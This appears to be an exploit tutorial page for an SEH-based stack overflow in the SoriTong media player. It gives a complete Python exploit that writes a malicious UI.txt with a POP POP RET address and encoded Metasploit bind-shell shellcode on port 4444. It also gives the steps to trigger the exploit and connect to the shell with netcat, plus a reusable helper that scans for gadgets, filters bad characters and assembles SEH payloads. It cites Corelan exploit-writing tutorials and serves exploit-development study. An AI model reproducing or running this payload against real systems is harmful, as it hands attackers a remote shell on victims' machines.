exploit - stack overflow with seh

Demo Prog:

SoriTong


Exploit Code

#!/usr/bin/env python
# -*- coding: utf8 -*-

# Author: Nixawk

# SoriTong reads Skin\Default\UI.txt at start-up; an over-long file
# overwrites the SEH record on the stack. Raw string so the backslashes
# in the path are not interpreted as escape sequences.
fpath = r"C:\Program Files\SoriTong\Skin\Default\UI.txt"

# Binary mode: the payload is raw bytes, not text.
with open(fpath, "wb") as f:
    junk = b"A" * 584                 # filler up to the SEH record
    nseh = b"\xEB\x06\x90\x90"        # next SEH pointer: JMP SHORT +6 over the handler address into the sled
    pseh = b"\x8C\xDD\x01\x10"        # SEH handler: POP POP RET at 0x1001dd8c (little-endian), found with !mona seh

    # bad chars: 00 09 0A 0D (none may appear in nseh, pseh or the shellcode)

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf =  b"\x90" * 32               # NOP sled the short jump lands in
    buf += b"\xd9\xcf\xbd\xa5\x08\x25\xa6\xd9\x74\x24\xf4\x5e\x29"
    buf += b"\xc9\xb1\x53\x83\xc6\x04\x31\x6e\x13\x03\xcb\x1b\xc7"
    buf += b"\x53\xef\xf4\x85\x9c\x0f\x05\xea\x15\xea\x34\x2a\x41"
    buf += b"\x7f\x66\x9a\x01\x2d\x8b\x51\x47\xc5\x18\x17\x40\xea"
    buf += b"\xa9\x92\xb6\xc5\x2a\x8e\x8b\x44\xa9\xcd\xdf\xa6\x90"
    buf += b"\x1d\x12\xa7\xd5\x40\xdf\xf5\x8e\x0f\x72\xe9\xbb\x5a"
    buf += b"\x4f\x82\xf0\x4b\xd7\x77\x40\x6d\xf6\x26\xda\x34\xd8"
    buf += b"\xc9\x0f\x4d\x51\xd1\x4c\x68\x2b\x6a\xa6\x06\xaa\xba"
    buf += b"\xf6\xe7\x01\x83\x36\x1a\x5b\xc4\xf1\xc5\x2e\x3c\x02"
    buf += b"\x7b\x29\xfb\x78\xa7\xbc\x1f\xda\x2c\x66\xfb\xda\xe1"
    buf += b"\xf1\x88\xd1\x4e\x75\xd6\xf5\x51\x5a\x6d\x01\xd9\x5d"
    buf += b"\xa1\x83\x99\x79\x65\xcf\x7a\xe3\x3c\xb5\x2d\x1c\x5e"
    buf += b"\x16\x91\xb8\x15\xbb\xc6\xb0\x74\xd4\x2b\xf9\x86\x24"
    buf += b"\x24\x8a\xf5\x16\xeb\x20\x91\x1a\x64\xef\x66\x5c\x5f"
    buf += b"\x57\xf8\xa3\x60\xa8\xd1\x67\x34\xf8\x49\x41\x35\x93"
    buf += b"\x89\x6e\xe0\x0e\x81\xc9\x5b\x2d\x6c\xa9\x0b\xf1\xde"
    buf += b"\x42\x46\xfe\x01\x72\x69\xd4\x2a\x1b\x94\xd7\x45\x80"
    buf += b"\x11\x31\x0f\x28\x74\xe9\xa7\x8a\xa3\x22\x50\xf4\x81"
    buf += b"\x1a\xf6\xbd\xc3\x9d\xf9\x3d\xc6\x89\x6d\xb6\x05\x0e"
    buf += b"\x8c\xc9\x03\x26\xd9\x5e\xd9\xa7\xa8\xff\xde\xed\x5a"
    buf += b"\x63\x4c\x6a\x9a\xea\x6d\x25\xcd\xbb\x40\x3c\x9b\x51"
    buf += b"\xfa\x96\xb9\xab\x9a\xd1\x79\x70\x5f\xdf\x80\xf5\xdb"
    buf += b"\xfb\x92\xc3\xe4\x47\xc6\x9b\xb2\x11\xb0\x5d\x6d\xd0"
    buf += b"\x6a\x34\xc2\xba\xfa\xc1\x28\x7d\x7c\xce\x64\x0b\x60"
    buf += b"\x7f\xd1\x4a\x9f\xb0\xb5\x5a\xd8\xac\x25\xa4\x33\x75"
    buf += b"\x5b\x54\x89\x60\xcc\xcf\x78\xc9\x90\xef\x57\x0e\xad"
    buf += b"\x73\x5d\xef\x4a\x6b\x14\xea\x17\x2b\xc5\x86\x08\xde"
    buf += b"\xe9\x35\x28\xcb"

    # Pad the file to exactly 5000 bytes so the overflow runs far enough past
    # the SEH record to trigger the exception that dispatches to our handler.
    nops = b"\x90" * (5000 - len(junk) - len(nseh) - len(pseh) - len(buf))
    payload = junk + nseh + pseh + buf + nops
    f.write(payload)

How to exploit SoriTong?

1. python2 exploit_soritong.py (writes the malicious UI.txt into SoriTong's skin directory)
2. cmd.exe /c SoriTong.exe (or double-click it); the player parses UI.txt, the overflow raises an exception, the overwritten handler runs the shellcode, and a bind shell listens on port 4444
3. nc -v 127.0.0.1 4444

Questions:

  1. How do you find a POP POP RET address to overwrite the SEH handler pointer with?
  2. How do you avoid bad characters (here 00 09 0A 0D)?
  3. Can a stack overflow in this program be exploited through SEH at all?
  4. How do you use the mona plugin for Immunity Debugger?
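The layout the script above hard-codes (junk, nSEH, SEH, NOP sled, shellcode, padding) and the first two questions (finding a POP POP RET and avoiding bad characters) can be checked mechanically instead of by hand. The following Python 3 helper is an added example, not code from the original post or from SoriTong: it packs the handler address little-endian, refuses to emit a payload that contains one of the reported bad characters, and scans raw module bytes for POP r32 / POP r32 / RET sequences the way !mona seh does at the byte level (without mona's SafeSEH, rebase and ASLR checks). The module image, its base address and the INT3 stand-in shellcode in the demo are constructed for the example; the offset 584 and the handler address 0x1001dd8c are the post's.

```python
import struct

# Bad characters the post reports for SoriTong's UI.txt parser.
BAD_CHARS = b"\x00\x09\x0a\x0d"

# x86 opcodes: POP r32 is 58..5F, RET is C3, RET imm16 is C2.
POP_R32 = frozenset(range(0x58, 0x60))
RET = frozenset((0xC3, 0xC2))


def pack_address(addr):
    """Little-endian 32-bit encoding, i.e. the bytes that go into the file."""
    return struct.pack("<I", addr)


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return [(offset, byte_value), ...] for every bad byte in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad_chars]


def find_pop_pop_ret(module, image_base, bad_chars=None):
    """Scan raw module bytes for POP r32; POP r32; RET and return the
    virtual addresses of the hits. This is the byte-level gadget search
    behind '!mona seh'; unlike mona it does not check SafeSEH, rebasing
    or ASLR. If bad_chars is given, drop addresses whose little-endian
    encoding contains one of them, since they could never be written."""
    hits = []
    for i in range(len(module) - 2):
        if module[i] in POP_R32 and module[i + 1] in POP_R32 and module[i + 2] in RET:
            addr = image_base + i
            if bad_chars is None or not find_bad_chars(pack_address(addr), bad_chars):
                hits.append(addr)
    return hits


def build_seh_payload(offset, pop_pop_ret, shellcode, total_len,
                      bad_chars=BAD_CHARS, sled_len=32):
    """Lay out junk | nSEH | SEH | NOP sled | shellcode | padding.

    offset       filler bytes before the SEH record (584 for SoriTong)
    pop_pop_ret  address written over the handler pointer
    total_len    size of the file; it must reach past the SEH record so
                 that the overflow raises an exception
    Raises ValueError if the part that must survive the parser contains a
    bad character, or if the pieces do not fit in total_len."""
    # nSEH is executed as code after the handler's POP POP RET returns into it:
    # EB 06 = JMP SHORT +6, skipping the two NOPs and the 4-byte handler address.
    nseh = b"\xeb\x06\x90\x90"
    seh = pack_address(pop_pop_ret)
    body = nseh + seh + b"\x90" * sled_len + shellcode
    bad = find_bad_chars(body, bad_chars)
    if bad:
        raise ValueError("bad chars after junk at offsets %r" % [i for i, _ in bad])
    pad_len = total_len - offset - len(body)
    if pad_len < 0:
        raise ValueError("shellcode does not fit in %d bytes" % total_len)
    return b"A" * offset + body + b"\x90" * pad_len


if __name__ == "__main__":
    # Constructed module image: POP EAX; POP EBX; RET at +2 and
    # POP ESI; POP EDI; RET 4 at +6. Base chosen so neither address has a bad byte.
    module = b"\x90\x90\x58\x5b\xc3\x00\x5e\x5f\xc2\x04\x00\x90"
    print([hex(a) for a in find_pop_pop_ret(module, 0x10011100, BAD_CHARS)])

    # Same layout as the SoriTong exploit, with INT3s standing in for shellcode.
    payload = build_seh_payload(584, 0x1001DD8C, b"\xcc" * 4, 5000)
    print(len(payload), payload[584:592].hex())
```

Run the gadget scan over the bytes of a DLL the target loads (read the file and pass its image base) to get candidates, then pick one that mona also reports as SafeSEH-free and not rebased; the bad-char filter is what rules out otherwise usable addresses such as ones containing 0x0A or 0x0D.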

References:
1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
2. https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
